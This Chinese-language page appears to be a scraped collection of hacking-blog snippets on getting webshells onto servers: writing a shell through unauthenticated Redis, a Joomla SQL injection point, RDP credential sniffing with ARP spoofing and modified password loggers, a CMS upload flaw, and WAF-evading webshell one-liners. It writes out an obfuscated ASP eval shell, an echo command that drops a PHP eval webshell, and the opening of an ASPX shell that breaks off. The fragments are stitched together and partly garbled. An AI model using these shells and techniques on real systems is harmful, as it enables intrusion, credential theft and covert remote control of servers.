redis写shell的小技巧

最近碰到一个redis未授权访问,想近各种办法最后终于成功了写了webshell,这里写下一点点小经验。

首先,写shell的基本方式,还是按照phithon发的文章,安全脉搏的《利用redis写webshell》

这种方法对于没有存多少数据的redis数据库来说还是很适用的,但是当数据库比较大时,就会遇到一些问题(比如本例中数据库下载下来大小约为200M,还算比较大的)。

首先就是这么大的数据量,里面不可避免会出现这样的字符串“<?”,php遇到这个字符串时就把后面的内容当php脚本解析了,自然会报错,不能运行,对于这个问题,没别的办法,只能找到出错的地方的键值,删掉,然后再写shell。


推荐个扫 webshell后门 webshell木马 一句话的asp程序

功能说明:
1.能查找后缀名为asp,asa,cdx,cer,aspx等木马
  如果目录下文件过多,容易脚本超时。

2.能查找IIS解析漏洞的文件,这些文件不一定是木马,需要手动查看
  比如"D:\WEBROOT\website\hack.asp\a.gif"或
  "D:\WEBROOT\website\hack.asp;.gif"一类的文件能查到

权5站点全站不可写拿webshell方法

看到一个站点,(此处忽略一万字)先爬虫一下。

使用这个工具

发现一个info目录很可疑,打开以后凭借我多年的日站经验、敏锐的观察力、超强的分析力; 断定这是WordPress
此博客程序没有什么好的漏洞,好用的XSS又需要管理员交互
于是使用以下脚本:


Joomla 3.2 – 3.4.4 无限制SQL注入漏洞

看到一个通杀 Joolma 3.2 到 3.4.4 版本的注入漏洞,可获得管理员权限,详细分析见此 Joomla SQL Injection Vulnerability Exploit Results in Full Administrative Access

注入点存在于 /administrator/components/com_contenthistory/models/history.php。原因是 populateState 函数没有对 list.select 进行过滤。

嗅探、劫持 3389 端口、远程桌面、rdp 协议的一些经验技巧总结

1、直接运用 CAIN 东西嗅探,然后剖析嗅探到的数据包,剖析办法见底下。
2、先看那机器的终端是谁连过去的,然后架 rdp proxy,然后 arp 诈骗,终究从 rdp proxy 的嗅探记载里,直接拿到登入明文。
3、垂钓进犯,运用 Arp 绑架,诈骗本机为方针机器,然后在本机装置本地暗码记载软件,例如:WinlogonHackWinPswLogger 等东西(留意:这些东西都要修正,改成即便是过错暗码也要记载,否则你啥都记载不到!),然后坐等办理员衔接,得到暗码后康复 Arp 绑架。
4、Arp 绑架 + 中心人转发数据的嗅探的办法,具体描述见底下。 

逐浪cms 2.4某处任意文件上传

/Plugins/swfFileUpload/UploadHandler.ashx
有一个全局过滤
1
asp_code.dll
class ZoomlaSecurityCenter

另类姿势GetShell php大马

过安全狗asp一句话

过安全狗asp一句话

-5kik <%@codepage=65000%>
<%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=936:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("5kik")%>

dos命令下写webshell语句

linux:echo -e “<[email protected](\\$_POST[“c”]);?>” > webshell.cc.php 会再同目录下生成webshell.cc.php一句话 密码:c

过各种waf墙aspx一句话

过各种waf墙aspx一句话

<script runat="server" language="JScript">
function exs(str) {
	var q = "u";
	var w = "afe";